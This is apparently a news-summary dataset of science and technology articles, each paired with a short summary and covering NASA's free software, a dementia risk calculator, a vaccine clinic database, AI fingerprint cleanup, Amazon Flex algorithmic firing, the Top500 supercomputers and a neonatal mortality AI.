The public will now have access to many of NASA's computational innovations thanks to a new effort to make some of them available for download . NASA Administrator Bill Nelson said in a statement that there are more than 800 pieces of software created by the organization that have helped operations both on Earth and on missions to the Moon and Mars. NASA is sharing the programs through its Technology Transfer program which is run by the Space Technology Mission Directorate. NASA noted that it was important for American taxpayers to benefit from technologies developed by and for NASA. "The good news is this technology is available to the public for free," Nelson said. "The software suited for satellites, astronauts, engineers, and scientists as it is applied and adapted across industries and businesses is a testament to the extensive value NASA brings to the United States -- and the world." NASA provided a detailed outline of how people and companies can use their software, advising those interested to find NASA technologies for licensing at technology.nasa.gov and then submit a license application and commercialization plan online. If the application is accepted, the person or company will work with a NASA licensing manager to set the terms of the license agreement before a final agreement is signed. NASA has long collaborated with public and private organizations on a variety of efforts like TetrUSS. Researchers at NASA worked on reducing aircraft emissions through computational fluid dynamics programs that minimize drag. TetrUSS has now become one of the organization's most downloaded applications ever and is currently in use in the production of planes, trains, cars, boats and even buildings. NASA also cited its work with WorldWind, a data visualization tool that they said is currently helping the Coast Guard generate maps from live feeds of satellite and maritime data. The project has helped "decision-makers worldwide manage scarce resources" and "researchers understand climate impacts on freshwater resources." Technology Transfer Program Executive Dan Lockney said many of NASA's programs will be integral in addressing the effects of climate change. "By making our repository of software widely accessible, NASA helps entrepreneurs, business owners, academia, and other government agencies solve real problems," Lockney said. In addition to TetrUSS and WorldWind, NASA also has programs that can calculate a solar power system's size and power requirements using fuel cells, solar cells, and batteries as well as code that can analyze solar aircraft concepts. Other software for computational fluid dynamics may help "improve the efficiency of wind turbines for power generation." The rest of NASA software catalog includes categories like system testing, aeronautics, data and image processing, autonomous systems, and more. The software is also continuously updated in a searchable repository. NASA will hold a virtual event on July 13 to explain the effort more and answer questions.
The U.S. National Aeronautics and Space Administration (NASA) will make more than 800 software products created by the agency freely available to the public through the Technology Mission Directorate's Technology Transfer Program. NASA, which emphasized the importance of American taxpayers benefiting from its innovations, is providing a detailed outline of how individuals and organizations may be able to utilize their software. Interested parties are encouraged to contact NASA at technology.NASA.gov for assistance in identifying technologies that can be licensed; qualified potential users also will need to submit a license application and commercialization plan online.
[]
[]
[]
scitechnews
None
None
None
None
The U.S. National Aeronautics and Space Administration (NASA) will make more than 800 software products created by the agency freely available to the public through the Technology Mission Directorate's Technology Transfer Program. NASA, which emphasized the importance of American taxpayers benefiting from its innovations, is providing a detailed outline of how individuals and organizations may be able to utilize their software. Interested parties are encouraged to contact NASA at technology.NASA.gov for assistance in identifying technologies that can be licensed; qualified potential users also will need to submit a license application and commercialization plan online. The public will now have access to many of NASA's computational innovations thanks to a new effort to make some of them available for download . NASA Administrator Bill Nelson said in a statement that there are more than 800 pieces of software created by the organization that have helped operations both on Earth and on missions to the Moon and Mars. NASA is sharing the programs through its Technology Transfer program which is run by the Space Technology Mission Directorate. NASA noted that it was important for American taxpayers to benefit from technologies developed by and for NASA. "The good news is this technology is available to the public for free," Nelson said. "The software suited for satellites, astronauts, engineers, and scientists as it is applied and adapted across industries and businesses is a testament to the extensive value NASA brings to the United States -- and the world." NASA provided a detailed outline of how people and companies can use their software, advising those interested to find NASA technologies for licensing at technology.nasa.gov and then submit a license application and commercialization plan online. If the application is accepted, the person or company will work with a NASA licensing manager to set the terms of the license agreement before a final agreement is signed. NASA has long collaborated with public and private organizations on a variety of efforts like TetrUSS. Researchers at NASA worked on reducing aircraft emissions through computational fluid dynamics programs that minimize drag. TetrUSS has now become one of the organization's most downloaded applications ever and is currently in use in the production of planes, trains, cars, boats and even buildings. NASA also cited its work with WorldWind, a data visualization tool that they said is currently helping the Coast Guard generate maps from live feeds of satellite and maritime data. The project has helped "decision-makers worldwide manage scarce resources" and "researchers understand climate impacts on freshwater resources." Technology Transfer Program Executive Dan Lockney said many of NASA's programs will be integral in addressing the effects of climate change. "By making our repository of software widely accessible, NASA helps entrepreneurs, business owners, academia, and other government agencies solve real problems," Lockney said. In addition to TetrUSS and WorldWind, NASA also has programs that can calculate a solar power system's size and power requirements using fuel cells, solar cells, and batteries as well as code that can analyze solar aircraft concepts. Other software for computational fluid dynamics may help "improve the efficiency of wind turbines for power generation." The rest of NASA software catalog includes categories like system testing, aeronautics, data and image processing, autonomous systems, and more. The software is also continuously updated in a searchable repository. NASA will hold a virtual event on July 13 to explain the effort more and answer questions.
172
Free Online Calculator for Dementia Risk
Researchers in Canada have created an easily accessible tool for people worried about the possibility of cognitive decline as they grow older. The online calculator is supposed to estimate the general risk of dementia for the average person 55 and older and is based on research published this month. Dementia is a broad term for many conditions, linked by the usually worsening loss of cognitive functions like memory. The most common form, Alzheimer's disease, is thought to affect 50 million people worldwide. Dementia is generally not curable once symptoms start, and it often leads to death. Our risk of dementia climbs the older we become, though there are some forms directly tied to inherited genetic mutations, which may occur earlier in life . But doctors do suspect there are many controllable aspects of our environment that influence dementia risk, and several studies have suggested over a third of cases could be preventable through changing these aspects for the better. This new research, led by scientists at the University of Ottawa, builds on these earlier studies by trying to create a predictive algorithm for the short-term risk of dementia in the general population. It was created through studying the responses of 50,000 residents of Ontario, Canada, 55 years old and up, who were part of a long-running population study in which they answered basic questions about their current health and lifestyle. Their (anonymous) medical records were tracked following their participation in the study, which meant researchers could tell how many were diagnosed with dementia over the next five years. The researchers compared the people with dementia to those without to see which risk factors seemed to be most predictive and fed all this information into the algorithm. Then they tested out their calculations on another sample of 25,000 people and found that it was generally accurate in predicting a person's dementia risk. The study's findings were published over the weekend in the Journal of Epidemiology and Community Health, and the calculator can be accessed on their Project Big Life website. The website also contains similar tools for estimating life expectancy and risk of heart disease . (I n a show of faith, perhaps, the bios of the research team include their life expectancy, presumably obtained through said tool. ) Among other things, the brief questionnaire used for the dementia calculator asks about suspected risk factors such as smoking history, level of physical activity, and other chronic illnesses. It then pops out a number from 1 to 100, estimating risk of dementia in the next five years, and provides a top three list of modifiable risk factors and possible ways to change them, along with links to further relevant information. Though it's based on scientific evidence , this calculator (and really any predictive algorithm) shouldn't be interpreted as a sure thing . At best, it may provide a rough sense of general dementia risk, not a precise prediction, and it's most accurate for the average person with no other hidden risk factors like family history or genetics. Indeed, the authors caution in their FAQ that their model simply can't take genetics into account, since the survey data didn't have that information available. P eople worried about the results they get from the calculator s hould talk with a medical provider about their brain health.
Scientists at Canada's University of Ottawa (U of O) have developed a calculator capable of estimating the general risk of dementia for people 55 and older, which they are making available for use online, for free. The researchers based the calculator's predictive algorithm on the responses of 50,000 Ontarians age 55 and older to health and lifestyle queries, and follow-up tracking of their medical records over five years. The U of O team compared data on individuals with dementia to data on those without dementia to determine the most predictive risk factors, which were incorporated into the algorithm. The researchers said the calculator cannot account for genetics, which means it may offer an approximate sense of general dementia risk at best.
[]
[]
[]
scitechnews
None
None
None
None
Scientists at Canada's University of Ottawa (U of O) have developed a calculator capable of estimating the general risk of dementia for people 55 and older, which they are making available for use online, for free. The researchers based the calculator's predictive algorithm on the responses of 50,000 Ontarians age 55 and older to health and lifestyle queries, and follow-up tracking of their medical records over five years. The U of O team compared data on individuals with dementia to data on those without dementia to determine the most predictive risk factors, which were incorporated into the algorithm. The researchers said the calculator cannot account for genetics, which means it may offer an approximate sense of general dementia risk at best. Researchers in Canada have created an easily accessible tool for people worried about the possibility of cognitive decline as they grow older. The online calculator is supposed to estimate the general risk of dementia for the average person 55 and older and is based on research published this month. Dementia is a broad term for many conditions, linked by the usually worsening loss of cognitive functions like memory. The most common form, Alzheimer's disease, is thought to affect 50 million people worldwide. Dementia is generally not curable once symptoms start, and it often leads to death. Our risk of dementia climbs the older we become, though there are some forms directly tied to inherited genetic mutations, which may occur earlier in life . But doctors do suspect there are many controllable aspects of our environment that influence dementia risk, and several studies have suggested over a third of cases could be preventable through changing these aspects for the better. This new research, led by scientists at the University of Ottawa, builds on these earlier studies by trying to create a predictive algorithm for the short-term risk of dementia in the general population. It was created through studying the responses of 50,000 residents of Ontario, Canada, 55 years old and up, who were part of a long-running population study in which they answered basic questions about their current health and lifestyle. Their (anonymous) medical records were tracked following their participation in the study, which meant researchers could tell how many were diagnosed with dementia over the next five years. The researchers compared the people with dementia to those without to see which risk factors seemed to be most predictive and fed all this information into the algorithm. Then they tested out their calculations on another sample of 25,000 people and found that it was generally accurate in predicting a person's dementia risk. The study's findings were published over the weekend in the Journal of Epidemiology and Community Health, and the calculator can be accessed on their Project Big Life website. The website also contains similar tools for estimating life expectancy and risk of heart disease . (I n a show of faith, perhaps, the bios of the research team include their life expectancy, presumably obtained through said tool. ) Among other things, the brief questionnaire used for the dementia calculator asks about suspected risk factors such as smoking history, level of physical activity, and other chronic illnesses. It then pops out a number from 1 to 100, estimating risk of dementia in the next five years, and provides a top three list of modifiable risk factors and possible ways to change them, along with links to further relevant information. Though it's based on scientific evidence , this calculator (and really any predictive algorithm) shouldn't be interpreted as a sure thing . At best, it may provide a rough sense of general dementia risk, not a precise prediction, and it's most accurate for the average person with no other hidden risk factors like family history or genetics. Indeed, the authors caution in their FAQ that their model simply can't take genetics into account, since the survey data didn't have that information available. P eople worried about the results they get from the calculator s hould talk with a medical provider about their brain health.
173
LaShawn Toyoda Learned How to Code During the Pandemic. Japan's International Community Is Glad She Did.
The mood on her Twitter feed was dark and full of anxiety, so LaShawn Toyoda, 36, decided to do something about it. "People were really upset, scared and stressed out," she says. "With the Olympics coming up, worries about the pandemic were exacerbated by the slow rollout of the vaccine and the lack of (English-language) information about the voucher system. They had no idea when they would get one, and resources in languages other than Japanese were scarce." Toyoda had a new set of skills that she could apply to the problem, as she had recently learned to code. Originally from Maryland, she arrived in Japan after the country was hit by the Great East Japan Earthquake in March 2011. She worked as an English teacher until last spring, but left that job because she didn't feel comfortable teaching in-person classes during the pandemic, potentially bringing the coronavirus home to her baby. As she was trying to decide on her next step, Code Chrysalis co-founder Yan Fan reached out to her and suggested she try learning to code. Toyoda had always thought that coding might be interesting, but at the same time wasn't sure if she could really do it. She decided to give it a try, anyway. The course was intense, "like being in finals week of university except it lasts for three months." She adds that it's deceptive, because "everyone's so nice and so friendly, but the boot camp is brutal. There is a constant pressure to learn and cram so much, and a mountain of homework if you don't finish everything in class. Some people doubt you can learn to code in a couple of months, but it is possible when you are coding up to 16 hours a day." Then, on a Sunday night earlier this month, she asked her husband to watch her toddler and sat down to do some coding. The result was an open-source database of clinics offering waiting lists for appointments to get a COVID-19 vaccine across the country: findadoc.jp . Toyoda announced her creation on Twitter and woke up the next day to find there had been more than 60,000 requests to access the database, and that it had exceeded the free quota of her hosting service due to the large number of queries. "I thought people needed a service like this, but I didn't realize just how badly they needed it and that the demand would be so huge," she says. "By the end of the second day, the database hit over 300,000 requests as people scrambled to find clinics offering vaccinations." For the next week Toyoda hardly slept, juggling work on the database with her full-time job and taking care of her young daughter. Meanwhile, people came out of the woodwork to support her. Experienced developers from companies like Google, Amazon, Indeed and Mercari volunteered their help with the coding and know-how on managing such a project. Volunteer translators stepped up, and the database is now available in 17 languages. "I can't really take all of the credit," she says. "I started it, but the community really jumped in and helped to build it. I think it came at just the right time. So many people felt hopeless about the vaccine situation, but this gave them a way to do something." Having never worked on a project of this scope before, Toyoda has had to learn quickly. For example, the moment she thought she had everything ready and made her repository public, she got a warning from Google that she had left some secret keys on the internet that weren't supposed to be there. Fortunately, the many volunteers have been able to help. "They've been coaching me through the process without taking over the project, which is really nice," she says. "I feel like I've learned even more now than I did when I was taking programming courses just because I'm actually working on a real application." You might think that a project like this would be extremely stressful, but Toyoda seems to be taking it in stride. "When things get really worrisome or heated, that's when I tend to buckle down and focus on what I can do to improve the situation," she says. "Not just for myself, but also for others." Due to the many submissions from users, the database has grown from the handful that Toyoda originally posted, and currently covers about 50 clinics, with the number constantly fluctuating as clinics fill their slots and are then removed from the list. She has added a function for users to report when a clinic no longer has spots available or if their requirements have changed. That also means if spots become available, a clinic can go back on the list. It's good to keep checking back to see if one opens up near you. Toyoda says she will keep the project up through the end of the vaccination period. After that, she plans to pursue her original vision, created while she was studying at the Code Chrysalis bootcamp last year, of creating a database of doctors who can speak multiple languages. She is viewing this as a long-term project, and is thinking of starting a non-profit organization to house it. Toyoda is enjoying her new career as a programmer, and wishes she had made the career change from English teaching earlier. She's also glad that she has been able to use her new skills to help the community, and asks that people continue to submit clinics to the database so that everyone can get vaccinated as soon as possible. "There's a really small but great community of people here in Japan from all over the world that want to help each other and contribute to Japanese society," Toyoda says. "I just created a tool that empowers them to do so." Japan Find-a-doc Covid19 Vaccine Database Founder LaShawn Toyoda Ep266. 🎥Subscribe: https://t.co/mtafmDqvOw #live #findadoc #findadocjp #findadocjapan #vaccinations #availablevaccinations #vaccinationsjapan #COVID19Vaccine #lashawntoyoda https://t.co/C5IkwJLmYn - JJWalsh 🌿⛩️🏝️🐱🌺☀️ (@jjwalsh) June 29, 2021
LaShawn Toyoda, who lives in Japan, learned programming during the COVID-19 pandemic, and used it to develop an open source database of clinics offering waiting lists for coronavirus vaccination appointments across that country. Toyoda said the findadoc.jp database received over 300,000 access requests by its second day of operation. Once it was launched, seasoned developers volunteered their help with coding and database management. Said Toyoda, "I can't really take all of the credit. I started it, but the community really jumped in and helped to build it. I think it came at just the right time. So many people felt hopeless about the vaccine situation, but this gave them a way to do something."
[]
[]
[]
scitechnews
None
None
None
None
LaShawn Toyoda, who lives in Japan, learned programming during the COVID-19 pandemic, and used it to develop an open source database of clinics offering waiting lists for coronavirus vaccination appointments across that country. Toyoda said the findadoc.jp database received over 300,000 access requests by its second day of operation. Once it was launched, seasoned developers volunteered their help with coding and database management. Said Toyoda, "I can't really take all of the credit. I started it, but the community really jumped in and helped to build it. I think it came at just the right time. So many people felt hopeless about the vaccine situation, but this gave them a way to do something." The mood on her Twitter feed was dark and full of anxiety, so LaShawn Toyoda, 36, decided to do something about it. "People were really upset, scared and stressed out," she says. "With the Olympics coming up, worries about the pandemic were exacerbated by the slow rollout of the vaccine and the lack of (English-language) information about the voucher system. They had no idea when they would get one, and resources in languages other than Japanese were scarce." Toyoda had a new set of skills that she could apply to the problem, as she had recently learned to code. Originally from Maryland, she arrived in Japan after the country was hit by the Great East Japan Earthquake in March 2011. She worked as an English teacher until last spring, but left that job because she didn't feel comfortable teaching in-person classes during the pandemic, potentially bringing the coronavirus home to her baby. As she was trying to decide on her next step, Code Chrysalis co-founder Yan Fan reached out to her and suggested she try learning to code. Toyoda had always thought that coding might be interesting, but at the same time wasn't sure if she could really do it. She decided to give it a try, anyway. The course was intense, "like being in finals week of university except it lasts for three months." She adds that it's deceptive, because "everyone's so nice and so friendly, but the boot camp is brutal. There is a constant pressure to learn and cram so much, and a mountain of homework if you don't finish everything in class. Some people doubt you can learn to code in a couple of months, but it is possible when you are coding up to 16 hours a day." Then, on a Sunday night earlier this month, she asked her husband to watch her toddler and sat down to do some coding. The result was an open-source database of clinics offering waiting lists for appointments to get a COVID-19 vaccine across the country: findadoc.jp . Toyoda announced her creation on Twitter and woke up the next day to find there had been more than 60,000 requests to access the database, and that it had exceeded the free quota of her hosting service due to the large number of queries. "I thought people needed a service like this, but I didn't realize just how badly they needed it and that the demand would be so huge," she says. "By the end of the second day, the database hit over 300,000 requests as people scrambled to find clinics offering vaccinations." For the next week Toyoda hardly slept, juggling work on the database with her full-time job and taking care of her young daughter. Meanwhile, people came out of the woodwork to support her. Experienced developers from companies like Google, Amazon, Indeed and Mercari volunteered their help with the coding and know-how on managing such a project. Volunteer translators stepped up, and the database is now available in 17 languages. "I can't really take all of the credit," she says. "I started it, but the community really jumped in and helped to build it. I think it came at just the right time. So many people felt hopeless about the vaccine situation, but this gave them a way to do something." Having never worked on a project of this scope before, Toyoda has had to learn quickly. For example, the moment she thought she had everything ready and made her repository public, she got a warning from Google that she had left some secret keys on the internet that weren't supposed to be there. Fortunately, the many volunteers have been able to help. "They've been coaching me through the process without taking over the project, which is really nice," she says. "I feel like I've learned even more now than I did when I was taking programming courses just because I'm actually working on a real application." You might think that a project like this would be extremely stressful, but Toyoda seems to be taking it in stride. "When things get really worrisome or heated, that's when I tend to buckle down and focus on what I can do to improve the situation," she says. "Not just for myself, but also for others." Due to the many submissions from users, the database has grown from the handful that Toyoda originally posted, and currently covers about 50 clinics, with the number constantly fluctuating as clinics fill their slots and are then removed from the list. She has added a function for users to report when a clinic no longer has spots available or if their requirements have changed. That also means if spots become available, a clinic can go back on the list. It's good to keep checking back to see if one opens up near you. Toyoda says she will keep the project up through the end of the vaccination period. After that, she plans to pursue her original vision, created while she was studying at the Code Chrysalis bootcamp last year, of creating a database of doctors who can speak multiple languages. She is viewing this as a long-term project, and is thinking of starting a non-profit organization to house it. Toyoda is enjoying her new career as a programmer, and wishes she had made the career change from English teaching earlier. She's also glad that she has been able to use her new skills to help the community, and asks that people continue to submit clinics to the database so that everyone can get vaccinated as soon as possible. "There's a really small but great community of people here in Japan from all over the world that want to help each other and contribute to Japanese society," Toyoda says. "I just created a tool that empowers them to do so." Japan Find-a-doc Covid19 Vaccine Database Founder LaShawn Toyoda Ep266. 🎥Subscribe: https://t.co/mtafmDqvOw #live #findadoc #findadocjp #findadocjapan #vaccinations #availablevaccinations #vaccinationsjapan #COVID19Vaccine #lashawntoyoda https://t.co/C5IkwJLmYn - JJWalsh 🌿⛩️🏝️🐱🌺☀️ (@jjwalsh) June 29, 2021
175
AI Clears Up Images of Fingerprints to Help with Identification
West Virginia University researchers have trained an artificial intelligence (AI) model to clean up distorted images of fingerprints from crime scenes to improve identification. The researchers developed a generative adversarial network by creating blurred versions of 15,860 clean fingerprint images from 250 subjects. They trained the AI using nearly 14,000 of these pairs of images; when they tested its performance on the remainder, they found the model to be 96% accurate at the lower end of the range of blurring intensity, and 86% at the higher end. Forensic Equity's David Goodwin said the use of neural networks to manipulate images would have trouble standing up in court because they cannot be audited like human-generated code, and the inner workings of these models are unknown.
[]
[]
[]
scitechnews
None
None
None
None
West Virginia University researchers have trained an artificial intelligence (AI) model to clean up distorted images of fingerprints from crime scenes to improve identification. The researchers developed a generative adversarial network by creating blurred versions of 15,860 clean fingerprint images from 250 subjects. They trained the AI using nearly 14,000 of these pairs of images; when they tested its performance on the remainder, they found the model to be 96% accurate at the lower end of the range of blurring intensity, and 86% at the higher end. Forensic Equity's David Goodwin said the use of neural networks to manipulate images would have trouble standing up in court because they cannot be audited like human-generated code, and the inner workings of these models are unknown.
176
Fired by Bot at Amazon: 'It's You Against the Machine'
Online retailing giant Amazon's Flex contract drivers say their jobs are at the mercy of software that can unfairly rate their performance. Algorithms mine data on performance patterns and assign drivers routes, or deactivate them, with little human feedback. One source says the Flex algorithms do not account for human nature, setting up good drivers for failure. A former engineer who helped design Flex says Amazon believes the program's benefits offset the collateral damage; a former manager says the company knew the software would lead to errors and bad press, but felt addressing such issues was unnecessarily expensive, as long as drivers could easily be replaced.
[]
[]
[]
scitechnews
None
None
None
None
Online retailing giant Amazon's Flex contract drivers say their jobs are at the mercy of software that can unfairly rate their performance. Algorithms mine data on performance patterns and assign drivers routes, or deactivate them, with little human feedback. One source says the Flex algorithms do not account for human nature, setting up good drivers for failure. A former engineer who helped design Flex says Amazon believes the program's benefits offset the collateral damage; a former manager says the company knew the software would lead to errors and bad press, but felt addressing such issues was unnecessarily expensive, as long as drivers could easily be replaced.
179
A New Supercomputer Has Joined the Top Five
The latest update to the list of the world's 500 most powerful supercomputers saw only one new entry in the top 10 , confirming that although these devices are still improving their performance, the pace of innovation is slowing down. Perlmutter, a US-based supercomputer located at the Department of Energy's Lawrence Berkeley Laboratory , entered the June edition of the Top500 list in fifth position, bumping Nvidia's Selene device to sixth place. At 64.6 petaflops, Perlmutter is the most notable change to the list; it also fared well in the Green500 list, which focuses on the energy efficiency of supercomputers, claiming number six spot thanks to a power efficiency of 25.55 gigaflops per watt. SEE: Hiring Kit: Computer Hardware Engineer (TechRepublic Premium) In total, there were only 58 new entries in the Top500 list. This is not far off the record-low of 44 new entrants registered last November , and indicates a slowdown compared to earlier years. In 2007, for example, 300 new devices made it to the ranking. This is mostly blamed on the impact of the COVID-19 crisis, which drove investment in commercial high-performance computing systems to an all-time low. The authors of the list admitted that the latest edition "saw little change," with Japan's Fugaku supercomputer still retaining a strong lead in the number-one spot. Fugaku came online last March and boasts a record-breaking 442 petaflops - meaning that it is three times more performant than the nearest competitor, IBM's Summit, which is hosted at the Oak Ridge National Laboratory and claims 148.8 petaflops. A product of a partnership between Riken and Fujitsu, Fugaku uses Fujitsu's custom ARM processor, which has enabled the device to reach peak performance of over an exaflop. "Such an achievement has caused some to introduce this machine as the first 'exascale' supercomputer," said the Top500 authors. Exascale computations can perform a quintillion calculations each second, and are expected to significantly speed up applications ranging from precision medicine to climate simulation. China, the US and the EU have all unveiled aggressive goals to achieve exascale computing systems in the next few years. In Japan's Research Organization for Information Science and Technology (RIST), Fugaku is set to advance a selected 74 scientific projects, many of which aim to accelerate research to combat the COVID-19 pandemic, such as early detection of disease or high-speed and high-precision drug discovery simulations. Competing behind Fugaku, the rest of the list's top 10 remained largely the same, with IBM's Sierra in third place following the company's Summit supercomputer. China saw a significant drop in the number of devices it can claim on the list. From 212 Chinese machines featuring on the previous iteration, the country now accounts for 186 supercomputers on the Top500 list. "There hasn't been much definitive proof of why this is happening, but it is certainly something to note," said the list's authors. Despite the drop, China still dominates the Top500: the next biggest competitor, the USA, lags behind with 123 systems on the list. This has led some researchers to conclude that the gap between the two countries is rapidly closing . It remains true, however, that the performance of Chinese supercomputers is far outstripped by other systems. The USA has an aggregate performance of 856.8 petaflops per second, while China's machines produce on average 445.3 petaflops per second. SEE: The global chip shortage will be a long-lasting problem. Here's what it means for you, and for the world In another noteworthy development, the Top500's authors highlighted the marked increase in the use of AMD processors, especially among the few new entries. The company's EPYC processors power half of the 58 new contestants, and three of the devices included in the top 10 - Perlmutter, Selene and Germany's Juwels Booster Module. Compared to the same time last year, AMD noted that EYMC systems also power five times more supercomputers throughout the entire list. "We are committed to enabling the performance and capabilities needed to advance scientific discoveries, break the exascale barrier, and continue driving innovation," said Forrest Morrod, senior vice president of the data center and embedded systems group at AMD. In terms of system interconnects, the authors observed little change, with ethernet used in around half of the systems. A third of the supercomputers leveraged Infiniband and less than a tenth relied on OmniPath. Custom interconnects accounted for 37 systems.
The Perlmutter supercomputer in the U.S. Department of Energy's Lawrence Berkeley Laboratory is the only new entry in the top 10 of the June edition of the Top500 listing of the world's most powerful supercomputers. With 64.6 petaflops, Perlmutter reached fifth place in the new ranking, pushing the previous fifth-place system, Nvidia's Selene, down to sixth place. Perlmutter also ranked sixth on the Green500 ranking of the most energy efficient supercomputers, with a power efficiency of 25.55 gigaflops per watt. Remaining at the top of the Top500 list were Japan's Fugaku (442 petaflops) and IBM's Summit (148.8 petaflops). China accounts for 186 supercomputers in the latest Top500, followed by the U.S. with 123.
[]
[]
[]
scitechnews
None
None
None
None
The Perlmutter supercomputer in the U.S. Department of Energy's Lawrence Berkeley Laboratory is the only new entry in the top 10 of the June edition of the Top500 listing of the world's most powerful supercomputers. With 64.6 petaflops, Perlmutter reached fifth place in the new ranking, pushing the previous fifth-place system, Nvidia's Selene, down to sixth place. Perlmutter also ranked sixth on the Green500 ranking of the most energy efficient supercomputers, with a power efficiency of 25.55 gigaflops per watt. Remaining at the top of the Top500 list were Japan's Fugaku (442 petaflops) and IBM's Summit (148.8 petaflops). China accounts for 186 supercomputers in the latest Top500, followed by the U.S. with 123. The latest update to the list of the world's 500 most powerful supercomputers saw only one new entry in the top 10 , confirming that although these devices are still improving their performance, the pace of innovation is slowing down. Perlmutter, a US-based supercomputer located at the Department of Energy's Lawrence Berkeley Laboratory , entered the June edition of the Top500 list in fifth position, bumping Nvidia's Selene device to sixth place. At 64.6 petaflops, Perlmutter is the most notable change to the list; it also fared well in the Green500 list, which focuses on the energy efficiency of supercomputers, claiming number six spot thanks to a power efficiency of 25.55 gigaflops per watt. SEE: Hiring Kit: Computer Hardware Engineer (TechRepublic Premium) In total, there were only 58 new entries in the Top500 list. This is not far off the record-low of 44 new entrants registered last November , and indicates a slowdown compared to earlier years. In 2007, for example, 300 new devices made it to the ranking. This is mostly blamed on the impact of the COVID-19 crisis, which drove investment in commercial high-performance computing systems to an all-time low. The authors of the list admitted that the latest edition "saw little change," with Japan's Fugaku supercomputer still retaining a strong lead in the number-one spot. Fugaku came online last March and boasts a record-breaking 442 petaflops - meaning that it is three times more performant than the nearest competitor, IBM's Summit, which is hosted at the Oak Ridge National Laboratory and claims 148.8 petaflops. A product of a partnership between Riken and Fujitsu, Fugaku uses Fujitsu's custom ARM processor, which has enabled the device to reach peak performance of over an exaflop. "Such an achievement has caused some to introduce this machine as the first 'exascale' supercomputer," said the Top500 authors. Exascale computations can perform a quintillion calculations each second, and are expected to significantly speed up applications ranging from precision medicine to climate simulation. China, the US and the EU have all unveiled aggressive goals to achieve exascale computing systems in the next few years. In Japan's Research Organization for Information Science and Technology (RIST), Fugaku is set to advance a selected 74 scientific projects, many of which aim to accelerate research to combat the COVID-19 pandemic, such as early detection of disease or high-speed and high-precision drug discovery simulations. Competing behind Fugaku, the rest of the list's top 10 remained largely the same, with IBM's Sierra in third place following the company's Summit supercomputer. China saw a significant drop in the number of devices it can claim on the list. From 212 Chinese machines featuring on the previous iteration, the country now accounts for 186 supercomputers on the Top500 list. "There hasn't been much definitive proof of why this is happening, but it is certainly something to note," said the list's authors. Despite the drop, China still dominates the Top500: the next biggest competitor, the USA, lags behind with 123 systems on the list. This has led some researchers to conclude that the gap between the two countries is rapidly closing . It remains true, however, that the performance of Chinese supercomputers is far outstripped by other systems. The USA has an aggregate performance of 856.8 petaflops per second, while China's machines produce on average 445.3 petaflops per second. SEE: The global chip shortage will be a long-lasting problem. Here's what it means for you, and for the world In another noteworthy development, the Top500's authors highlighted the marked increase in the use of AMD processors, especially among the few new entries. The company's EPYC processors power half of the 58 new contestants, and three of the devices included in the top 10 - Perlmutter, Selene and Germany's Juwels Booster Module. Compared to the same time last year, AMD noted that EYMC systems also power five times more supercomputers throughout the entire list. "We are committed to enabling the performance and capabilities needed to advance scientific discoveries, break the exascale barrier, and continue driving innovation," said Forrest Morrod, senior vice president of the data center and embedded systems group at AMD. In terms of system interconnects, the authors observed little change, with ethernet used in around half of the systems. A third of the supercomputers leveraged Infiniband and less than a tenth relied on OmniPath. Custom interconnects accounted for 37 systems.
180
AI Breakthrough in Premature Baby Care
As part of her PhD work, JCU engineering lecturer Stephanie Baker led a pilot study that used a hybrid neural network to accurately predict how much risk individual premature babies face. She said complications resulting from premature birth are the leading cause of death in children under five and over 50 per cent of neonatal deaths occur in preterm infants. "Preterm birth rates are increasing almost everywhere. In neonatal intensive care units, assessment of mortality risk assists in making difficult decisions regarding which treatments should be used and if and when treatments are working effectively," said Ms Baker. She said to better guide their care, preterm babies are often given a score that indicates the risk they face. "But there are several limitations of this system. Generating the score requires complex manual measurements, extensive laboratory results, and the listing of maternal characteristics and existing conditions," said Ms Baker. She said the alternative was measuring variables that do not change - such as birthweight - that prevents recalculation of the infant's risk on an ongoing basis and does not show their response to treatment. "An ideal scheme would be one that uses fundamental demographics and routinely measured vital signs to provide continuous assessment. This would allow for assessment of changing risk without placing unreasonable additional burden on healthcare staff," said Ms Baker. She said the JCU team's research, published in the journal Computers in Biology and Medicine , had developed the Neonatal Artificial Intelligence Mortality Score (NAIMS), a hybrid neural network that relies on simple demographics and trends in heart and respiratory rate to determine mortality risk. "Using data generated over a 12 hour period, NAIMS showed strong performance in predicting an infant's risk of mortality within 3, 7, or 14 days. "This is the first work we're aware of that uses only easy-to-record demographics and respiratory rate and heart rate data to produce an accurate prediction of immediate mortality risk," said Ms Baker. She said the technique was fast with no need for invasive procedures or knowledge of medical histories. "Due to the simplicity and high performance of our proposed scheme, NAIMS could easily be continuously and automatically recalculated, enabling analysis of a baby's responsiveness to treatment and other health trends," said Ms Baker. She said NAIMS had proved accurate when tested against hospital mortality records of preterm babies and had the added advantage over existing schemes of being able to perform a risk assessment based on any 12-hours of data during the patient's stay. Ms Baker said the next step in the process was to partner with local hospitals to gather more data and undertake further testing. "Additionally, we aim to conduct research into the prediction of other outcomes in neo-natal intensive care, such as the onset of sepsis and patient length of stay," said Ms Baker.
A hybrid neural network can accurately forecast premature babies' individual mortality risk in order to better guide their care, thanks to scientists at Australia's James Cook University (JCU). JCU's Stephanie Baker said the Neonatal Artificial Intelligence Mortality Score (NAIMS) network assesses preterm infants' mortality risk based on simple demographics and trends in heart and respiratory rate. Baker said NAIMS could predict an infant's mortality risk within three, seven, or 14 days from data generated over 12 hours, without requiring invasive procedures or knowledge of medical histories. Said Baker, "Due to the simplicity and high performance of our proposed scheme, NAIMS could easily be continuously and automatically recalculated, enabling analysis of a baby's responsiveness to treatment and other health trends."
[]
[]
[]
scitechnews
None
None
None
None
A hybrid neural network can accurately forecast premature babies' individual mortality risk in order to better guide their care, thanks to scientists at Australia's James Cook University (JCU). JCU's Stephanie Baker said the Neonatal Artificial Intelligence Mortality Score (NAIMS) network assesses preterm infants' mortality risk based on simple demographics and trends in heart and respiratory rate. Baker said NAIMS could predict an infant's mortality risk within three, seven, or 14 days from data generated over 12 hours, without requiring invasive procedures or knowledge of medical histories. Said Baker, "Due to the simplicity and high performance of our proposed scheme, NAIMS could easily be continuously and automatically recalculated, enabling analysis of a baby's responsiveness to treatment and other health trends." As part of her PhD work, JCU engineering lecturer Stephanie Baker led a pilot study that used a hybrid neural network to accurately predict how much risk individual premature babies face. She said complications resulting from premature birth are the leading cause of death in children under five and over 50 per cent of neonatal deaths occur in preterm infants. "Preterm birth rates are increasing almost everywhere. In neonatal intensive care units, assessment of mortality risk assists in making difficult decisions regarding which treatments should be used and if and when treatments are working effectively," said Ms Baker. She said to better guide their care, preterm babies are often given a score that indicates the risk they face. "But there are several limitations of this system. Generating the score requires complex manual measurements, extensive laboratory results, and the listing of maternal characteristics and 